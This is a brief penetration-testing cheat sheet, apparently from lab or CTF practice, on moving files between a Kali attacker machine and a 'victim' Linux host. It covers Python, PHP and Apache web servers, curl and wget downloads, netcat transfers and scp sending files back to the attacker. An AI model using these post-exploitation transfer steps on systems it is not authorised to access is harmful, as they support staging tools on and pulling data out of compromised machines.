# Linux File Transfers

> Methodologies for Linux File Transfer

### Web Servers

##### Kali Machine

**Python Web Server**

```
sudo python -m SimpleHTTPServer 80
```

**PHP Web Server**

```
sudo php -S 0.0.0.0:8080
```

**Apache Web Server**

```
cp file.txt /var/www/html
service apache2 restart
```

##### Victim Machine

**Curl**

```
curl -O http://10.10.14.10/file.txt
```

**Wget**

```
wget http://10.10.14.10/file.txt -O file.txt
```

### Netcat

On Victim:

```
nc -nlvp 5555 > file.txt
```

In Kali:

```
nc 10.10.14.10 5555 < file.txt
```

### SCP

From Victim to Kali:

Note - Enable SSH in Kali

Victim Machine:

```
scp file.txt kali@10.10.14.10:/tmp
```